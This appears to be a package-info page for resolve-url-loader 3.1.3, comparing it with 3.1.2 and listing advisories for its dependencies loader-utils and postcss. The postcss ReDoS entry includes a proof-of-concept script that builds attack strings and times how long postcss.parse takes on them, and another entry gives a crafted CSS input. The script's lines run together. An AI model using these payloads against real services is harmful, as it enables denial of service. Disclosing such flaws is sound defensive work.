Resolve-url-loader is a valuable webpack loader designed to accurately resolve relative paths in url() statements within your CSS, SCSS, or other stylesheet files. It ensures that references to assets like images, fonts, and other resources are correctly resolved, even when your stylesheets are processed through multiple loaders or when using features like CSS modules. This enhances the integrity of your styling and prevents broken asset paths in your final application.
Comparing version 3.1.3 with its predecessor, 3.1.2, reveals subtle yet important improvements. Both versions share a similar set of dependencies, including packages like adjust-sourcemap-loader, camelcase, postcss, and source-map, which are crucial for source map handling and CSS processing. However, the key difference lies in the dist object. Version 3.1.3 has a slightly larger unpacked size of 42114 bytes compared to 3.1.2's 41823 bytes, suggesting potential minor enhancements, bug fixes, or updated dependencies that contribute to the increased size. The release dates also highlight the newer version, 3.1.3, was released in May 2021, roughly 6 months after 3.1.2. Developers should upgrade to the newer 3.1.3 version to benefit from the latest bug fixes and improvements guaranteeing better stability and better performance. While the core functionality remains consistent, staying up-to-date ensures a smoother development experience and optimal compatibility with modern webpack configurations.
All the vulnerabilities related to the version 3.1.3 of the package
loader-utils is vulnerable to Regular Expression Denial of Service (ReDoS) via url variable
A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js. A badly or maliciously formed string could be used to send crafted requests that cause a system to crash or take a disproportional amount of time to process. This issue has been patched in versions 1.4.2, 2.0.4 and 3.2.1.
Prototype pollution in webpack loader-utils
Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils prior to version 2.0.3 via the name variable in parseQuery.js.
loader-utils is vulnerable to Regular Expression Denial of Service (ReDoS)
A regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils via the resourcePath variable in interpolateName.js. A badly or maliciously formed string could be used to send crafted requests that cause a system to crash or take a disproportional amount of time to process. This issue has been patched in versions 1.4.2, 2.0.4 and 3.2.1.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r
discrepancies, as demonstrated by @font-face{ font:(\r/*);}
in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Regular Expression Denial of Service in postcss
The npm package postcss
from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.